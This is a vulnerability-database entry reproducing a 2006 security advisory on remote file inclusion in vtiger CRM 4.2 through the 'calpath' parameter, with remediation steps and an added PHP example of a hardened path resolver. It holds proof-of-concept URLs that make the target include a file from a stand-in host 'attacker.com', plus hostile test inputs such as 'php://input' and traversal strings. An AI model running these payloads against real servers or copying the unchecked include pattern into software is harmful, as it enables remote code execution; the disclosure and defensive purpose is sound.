VTiger CRM Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111232  Vulnerability type: Input validation
Published: 2006-10-10  Updated: 2006-10-16
CVE: CVE-2006-5289  CNNVD ID: CNNVD-200610-203
Platform: PHP  CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/2508
https://cxsecurity.com/issue/WLB-2006100086
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-203
|Details
Vtiger CRM 4.2 and earlier contain multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via a URL in the calpath parameter of (1) modules/Calendar/admin/update.php, (2) modules/Calendar/admin/scheme.php, or (3) modules/Calendar/calendar.php.
|Exploit
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_54$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_54$2006]vtiger CRM  <=4.2 (calpath) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: October, 09th 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv54-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: Vtiger CRM
version		: <=4.2
URL		: http://vtiger.com

vtiger CRM is a 100% open source Customer Relationship Management solution built on the
LAMP/WAMP stack and other third-party open source packages.
vtiger CRM can be installed on Windows NT/2000/XP/2003 and on various
Unix/Linux-based distributions, such as RedHat 7.2/8.0/9.0, Debian 3.0, SuSe 9.0, Fedora Core 3.0,
Mandrake 10.0, Mac OS, and FreeBSD.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In the folder modules/Calendar/admin/ I found a vulnerable script, update.php
--------------------------update.php---------------------------------------
....
<?

  // $calpath is never initialised in this script; with register_globals=On
  // it is populated directly from the request (?calpath=...).
  include_once $calpath .'webelements.p3';
  include_once $calpath .'permission.p3';
...
----------------------------------------------------------

Input passed to the "$calpath" parameter in update.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Affected files:

modules/Calendar/admin/update.php
modules/Calendar/admin/scheme.php
modules/Calendar/calendar.php


Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[vtiger_crm_path]/modules/Calendar/admin/update.php?calpath=http://attacker.com/inject.txt?
http://target.com/[vtiger_crm_path]/modules/Calendar/admin/scheme.php?calpath=http://attacker.com/inject.txt?
http://target.com/[vtiger_crm_path]/modules/Calendar/calendar.php?calpath=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Upgrade to Vtiger CRM 5.0
- Sanitize the variable $calpath in the affected files.
- Turn off register_globals

Timeline:
~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-10]
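The following is an added illustration, not code from the advisory above or from the vtiger project: it places the `include_once $calpath . 'webelements.p3'` shape next to a hardened resolver that only accepts sub-directories of a fixed calendar directory and rejects URLs, stream wrappers, NUL bytes and traversal. The function names (`vulnerable_include`, `resolve_calpath`), the temporary directory tree it builds, and the sample inputs are all constructed for this example.

```php
<?php
// Added example (not vtiger code): the calpath include pattern from the
// advisory, and a hardened resolver that only allows files under a fixed
// directory. Function names and the demo directory tree are hypothetical.

declare(strict_types=1);

// --- Vulnerable shape (update.php with register_globals=On) ---------------
// With register_globals, ?calpath=http://attacker.example/inject.txt? becomes
// $calpath, and include_once fetches and executes the remote file when URL
// includes are permitted (allow_url_fopen on PHP 4/5.0/5.1; allow_url_include
// exists only from PHP 5.2.0). The path is returned here instead of included
// so the example runs safely.
function vulnerable_include(string $calpath): string
{
    return $calpath . 'webelements.p3';
}

// --- Hardened resolver ----------------------------------------------------
// Resolve a user-supplied calendar path against a fixed base directory and
// refuse anything that escapes it. Returns the canonical directory (with a
// trailing separator) or null when the input must be rejected.
function resolve_calpath(string $baseDir, string $userPath): ?string
{
    // Reject any scheme prefix (http://, ftp://, php://, data:, ...) outright.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userPath)) {
        return null;
    }
    // NUL bytes truncated paths in older PHP and are never legitimate here.
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Only a relative name is accepted; it is joined below the base directory.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\'));
    if ($candidate === false) {
        return null;
    }
    // Canonical path must stay inside base. The trailing separator matters:
    // /var/www/cal must not authorise /var/www/calx.
    if ($candidate !== $base
        && strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate . DIRECTORY_SEPARATOR;
}

// --- Demo on a constructed directory tree --------------------------------
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'calpath_demo_' . getmypid();
mkdir($root . '/calendar/admin', 0700, true);
file_put_contents($root . '/calendar/admin/webelements.p3', "<?php echo 'ok'; ?>\n");

$inputs = [
    'admin/',                               // legitimate sub-directory
    'admin',                                // legitimate, no trailing slash
    'http://attacker.example/inject.txt?',  // remote include (the PoC shape)
    'php://input',                          // stream wrapper
    '../../etc/',                           // traversal out of the base
    "admin/\0",                             // NUL byte
];
foreach ($inputs as $in) {
    $resolved = resolve_calpath($root . '/calendar', $in);
    printf("%-42s vulnerable -> %s\n%-42s hardened   -> %s\n\n",
        json_encode($in), vulnerable_include($in),
        '', $resolved === null ? 'REJECTED' : 'OK ' . $resolved . 'webelements.p3');
}

// Clean up the constructed tree.
unlink($root . '/calendar/admin/webelements.p3');
rmdir($root . '/calendar/admin');
rmdir($root . '/calendar');
rmdir($root);
```

Running it shows why the PoC URLs end in `?`: the vulnerable concatenation turns `http://attacker.com/inject.txt?` into `http://attacker.com/inject.txt?webelements.p3`, so the appended file name becomes a harmless query string and the attacker's file is fetched unchanged. The hardened resolver never consults the raw string for the include; it only ever includes from a canonical path proven to sit under the base directory, which is the check the advisory's "sanitize $calpath" advice amounts to.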
|References

Source: XF
Name: vtiger-update-file-include(29416)
Link: http://xforce.iss.net/xforce/xfdb/29416
Source: BID
Name: 20435
Link: http://www.securityfocus.com/bid/20435
Source: BUGTRAQ
Name: 20061009 [ECHO_ADV_54$2006] vtiger CRM <=4.2 (calpath) Multiple Remote File Inclusion Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/448092/100/0/threaded
Source: MILW0RM
Name: 2508
Link: http://www.milw0rm.com/exploits/2508
Source: MISC
Link: http://advisories.echo.or.id/adv/adv54-theday-2006.txt
Source: SREASON
Name: 1722
Link: http://securityreason.com/securityalert/1722